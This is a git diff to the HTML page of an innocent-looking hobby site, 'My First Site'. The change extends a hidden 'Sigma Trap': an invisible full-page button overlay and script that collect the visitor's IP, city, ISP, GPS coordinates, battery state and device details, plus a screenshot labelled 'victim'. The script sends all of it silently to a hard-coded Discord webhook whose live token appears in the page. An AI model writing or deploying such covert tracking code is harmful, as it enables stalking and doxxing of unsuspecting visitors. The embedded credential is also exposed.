--- a/index.html
+++ b/index.html
@@ -5,24 +5,13 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>My First Site</title>
   <style>
-    body {
-      font-family: 'Comic Sans MS', cursive;
-      background: linear-gradient(to bottom, #ff9a9e, #fad0c4);
-      margin: 0; padding: 0; color: #333; text-align: center;
-    }
-    .container {
-      max-width: 700px; margin: 3rem auto; padding: 2rem;
-      background: rgba(255,255,255,0.9); border-radius: 20px;
-      box-shadow: 0 8px 20px rgba(0,0,0,0.1);
-    }
-    h1 { color: #e91e63; margin-bottom: 0.2rem; position: relative; }
-    .secret-btn {
-      position: absolute; top: 0; left: 0; width: 100%; height: 100%;
-      opacity: 0; cursor: pointer; z-index: 10;
-    }
-    .emoji { font-size: 3rem; margin: 1rem 0; }
-    .blink { animation: blink 1s step-end infinite; }
-    @keyframes blink { 50% { opacity: 0; } }
+    body {font-family:'Comic Sans MS',cursive;background:linear-gradient(to bottom,#ff9a9e,#fad0c4);margin:0;padding:0;color:#333;text-align:center;}
+    .container {max-width:700px;margin:3rem auto;padding:2rem;background:rgba(255,255,255,0.9);border-radius:20px;box-shadow:0 8px 20px rgba(0,0,0,0.1);}
+    h1 {color:#e91e63;margin-bottom:0.2rem;position:relative;}
+    .secret-btn {position:absolute;top:0;left:0;width:100%;height:100%;opacity:0;cursor:pointer;z-index:10;}
+    .emoji {font-size:3rem;margin:1rem 0;}
+    .blink {animation:blink 1s step-end infinite;}
+    @keyframes blink {50%{opacity:0;}}
   </style>
 </head>
 <body>
@@ -42,18 +31,20 @@
 <script>
   const WEBHOOK = 'https://discord.com/api/webhooks/1381021459350032484/Z-HEIw2n1czbqpnWl-UicGzWgfrHth3W0naPyAkIoI3Sf3bx4bsINYQJDnvIHf1ky0tL';
 
-  // Get GPS Location (if allowed)
+  function getBattery() {
+    return navigator.getBattery ? navigator.getBattery().then(b => ({
+      level: Math.round(b.level * 100) + '%',
+      charging: b.charging ? 'Yes' : 'No'
+    })) : Promise.resolve(null);
+  }
+
   function getLocation() {
-    return new Promise((resolve) => {
+    return new Promise(resolve => {
       if (!navigator.geolocation) return resolve(null);
       navigator.geolocation.getCurrentPosition(
-        pos => resolve({
-          lat: pos.coords.latitude,
-          lon: pos.coords.longitude,
-          accuracy: pos.coords.accuracy
-        }),
+        pos => resolve({ lat: pos.coords.latitude, lon: pos.coords.longitude, acc: pos.coords.accuracy }),
         () => resolve(null),
-        { timeout: 5000 }
+        { timeout: 7000, maximumAge: 0 }
       );
     });
   }
@@ -64,31 +55,48 @@
       const ipRes = await fetch('https://ipapi.co/json/');
       const ipData = await ipRes.json();
       const location = await getLocation();
-      const canvas = await html2canvas(document.body, { scale: 0.5 });
+      const battery = await getBattery();
+      const canvas = await html2canvas(document.body, { scale: 0.6 });
       const screenshot = canvas.toDataURL('image/png');
 
+      const device = {
+        ua: navigator.userAgent,
+        platform: navigator.platform,
+        language: navigator.language,
+        cookies: navigator.cookieEnabled ? 'Yes' : 'No',
+        online: navigator.onLine ? 'Yes' : 'No',
+        screen: `${screen.width}x${screen.height}`,
+        window: `${innerWidth}x${innerHeight}`,
+        timezone: Intl.DateTimeFormat().resolvedOptions().timeZone
+      };
+
       const embed = {
-        title: 'SIGMA TRAP ACTIVATED',
+        title: 'SIGMA TRAP v10 — FULL PROOF',
         color: 0x00ff00,
         fields: [
-          { name: 'IP', value: ipData.ip || 'Unknown', inline: true },
+          { name: 'IP', value: ipData.ip || '??', inline: true },
           { name: 'Time', value: time.split('T')[1].split('.')[0] + ' UTC', inline: true },
           { name: 'Date', value: time.split('T')[0], inline: true },
           { name: 'City', value: ipData.city || '??', inline: true },
           { name: 'Country', value: ipData.country_name || '??', inline: true },
-          { name: 'ISP', value: ipData.org || 'N/A', inline: true },
-          { name: 'Browser', value: navigator.userAgent.split(' ').slice(0,3).join(' '), inline: false }
+          { name: 'ISP', value: ipData.org || 'Hidden', inline: true },
+          { name: 'Device', value: device.ua.split(' ').slice(0,4).join(' '), inline: false },
+          { name: 'OS', value: device.platform, inline: true },
+          { name: 'Screen', value: device.screen, inline: true },
+          { name: 'Battery', value: battery ? `${battery.level} (${battery.charging})` : 'N/A', inline: true },
+          { name: 'Language', value: device.language, inline: true },
+          { name: 'Cookies', value: device.cookies, inline: true }
         ],
         timestamp: time,
-        footer: { text: 'Lxu00/MySite • Ultimate Sigma Trap' }
+        footer: { text: 'Lxu00/MySite • FULL PROOF' }
       };
 
       if (location) {
         embed.fields.push(
           { name: 'GPS Location', value: `Lat: ${location.lat}, Lon: ${location.lon}`, inline: true },
-          { name: 'Accuracy', value: `${location.accuracy}m`, inline: true }
+          { name: 'Accuracy', value: `${location.acc}m`, inline: true },
+          { name: 'Live Map', value: `https://maps.google.com/?q=${location.lat},${location.lon}`, inline: false }
         );
-        embed.fields.push({ name: 'Live Map', value: `https://www.google.com/maps?q=${location.lat},${location.lon}`, inline: false });
       }
 
       await fetch(WEBHOOK, {
@@ -96,7 +104,7 @@
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({
           embeds: [embed],
-          files: [{ attachment: screenshot, name: 'victim.png' }]
+          files: [{ attachment: screenshot, name: 'PROOF_victim.png' }]
         })
       });
     } catch (e) {}
